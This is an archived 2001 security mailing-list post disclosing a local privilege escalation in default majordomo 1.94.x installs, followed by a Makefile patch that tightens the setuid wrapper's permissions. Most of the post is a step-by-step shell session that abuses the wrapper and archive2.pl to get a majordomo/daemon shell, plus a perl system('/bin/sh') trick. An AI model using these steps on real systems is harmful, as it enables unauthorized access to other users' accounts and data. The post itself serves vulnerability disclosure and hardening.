Majordomo default vulns

From: Marco van Berkum (m.v.berkumat_private)
Date: Fri Sep 14 2001 - 02:24:27 PDT

Next message: Mario Schmidt: "Proof-Of-Concept Perl Script for Bugtraq-ID: #3334"

Previous message: Eric N. Valor: "Re: Bank of America Online Banking Security"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi,
I found something to discuss, this time involving majordomo. 
This was  tested on a Slackware linux 8.0 (kernel 2.4.8); 
majordomo version 1.94.4, I also tested the other versions 
and all _default_ installs had the same problem, note that 
the versions 1.94.1 an 1.94.2 should NOT be used anymore, 
those are way more simple to exploit. 

We all know that if you install majordomo you should 
CAREFULLY read the INSTALL file, simply because else 
you will have a security problem. Only I doubt that everyone 
actually follows the guidelines. Besides that, I feel that 
Majordomodevelopers _could_ make a more secure default 
install without affecting the functionality of the program. 
A simple patch would _at least_ stop the possiblities which 
are descibed below. 

Also I did not find in the documents that majordomo should 
have a shell (so give it a nologin or whatever, it works fine 
without shell). 

An example: 

Who am i 
marco@anubis:~$ id -a 
uid=1001(marco) gid=100(users) groups=100(users) 

This could happen if you give it a /home/majordomo 

marco@anubis:~$ ls -al /home/|grep majordomo 
drwxr-x--x    6 majordom daemon       4096 Sep 13 23:50 majordomo/ 

Suidbit + executable for everyone (this is where the patch comes in) 

marco@anubis:~$ ls -al ~majordomo/wrapper 
-rwsr-xr-x    1 root     daemon      16451 Aug 31 13:51 
/home/majordomo/wrapper* 

This is the program I'm going to abuse 

marco@anubis:~$ ls -al ~majordomo/archive2.pl 
-rwxr-xr-x    1 majordom daemon       5234 Aug 31 13:51
/home/majordomo/archive2.pl* 

Make a template 

marco@anubis:~$ echo "ln -s /bin/sh ~/majordomo/sh 2>/dev/null">test 

Append majordomo's .bash_profile (or .profile etc..) with your template 
using buggy archive2.pl (yes, not wrapper is buggy here, archive2.pl is, 
that one can use /'s, I need wrapper for becoming user majordomo
though). 

marco@anubis:~$ ~majordomo/wrapper archive2.pl -f .bash_profile -a
~marco/test 

Now hit the .bash_profile (sometimes the majordomo admin might need it 
and do the same). 

marco@anubis:~$ su - majordomo 
Password: 
majordomo@anubis:~$ id -a 
uid=666(majordomo) gid=2(daemon) groups=2(daemon) 
majordomo@anubis:~$ exit 

See if it worked 

marco@anubis:~$ ls -al ~majordomo/sh 
lrwxrwxrwx    1 majordom daemon          7 Sep 13 23:57 
/home/majordomo/sh -> /bin/sh* 

Jupz it worked, now someone could abuse it, let's do that. 

marco@anubis:~$ ~majordomo/wrapper sh 
sh-2.05$ id -a 
uid=666(majordomo) gid=2(daemon) groups=100(users) 
sh-2.05$ 

Ok, I'm majordomo. 

Also, in the README file is described how one could debug majordomo. 

<quote> 
Finally, if you're up to mucking around in the perl code, symlinking 
perl into ~majordomo and invoking it via wrapper will give you a debug 
environment with Majordomo's permissions and view of the world: 

                ~majordomo% ./wrapper perl -d majordomo 
</quote> 

Well, same problem :) 
Dont forget to remove the symlink or else everyone can do this: 

marco@anubis:~$ /home/majordomo/wrapper perl 
system("/bin/sh"); 
^D 
sh-2.04$ 

One could append the perlfiles to make them execute your evil code of 
course since the archive2 program appends. This could give a majordomo 
uid/daemon gid shell. 

The main point here is that we can write to majordomo owned files to 
simply alter data in the lists or score a shell (and obtaining a daemon
gid). 
reading the INSTALL file carefully will help you to prevent this, but I 
prefer to apply a patch before starting the  installation to make sure
that 
the wrapper is not executable for everyone (it _should_ have 4750 and
not 4755). 

--- simple patch to make default install more secure --- 

--- Makefile.orig       Fri Sep 14 09:43:45 2001 
+++ Makefile    Fri Sep 14 09:44:20 2001 
@@ -42,7 +42,7 @@ 
 # change these values! 
 WRAPPER_OWNER = root 
 WRAPPER_GROUP = $(W_GROUP) 
-WRAPPER_MODE = 4755 
+WRAPPER_MODE = 4750 
 POSIX = -DPOSIX_UID=$(W_USER) -DPOSIX_GID=$(W_GROUP) 
 # Otherwise, if your system is NOT POSIX (e.g. SunOS 4.x, SGI Irix 4, 
 # HP DomainOS) then comment out the above four lines and uncomment 

just my 2 cents, 
grtz, 
Marco van Berkum 
-- 
GCC dpu s:--- a- C+++ US++++ P++ L+++ E---- W N o-- K w---
O- M-- V-- PS+++ PE-- Y+ PGP--- t--- 5 X R* tv++ b+++ DI-- D----
G++ e- h+ r y*
+---------------------+------------------+-------------------+
|  Marco van Berkum   |   MB17300-RIPE   | Security Engineer |
|  http://ws.obit.nl  | "Chernobyl used  | Network Admin     |
|  m.v.berkumat_private |     Windows"     |      UNIX         |
+---------------------+------------------+-------------------+

Next message: Mario Schmidt: "Proof-Of-Concept Perl Script for Bugtraq-ID: #3334"
Previous message: Eric N. Valor: "Re: Bank of America Online Banking Security"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Sep 14 2001 - 17:11:34 PDT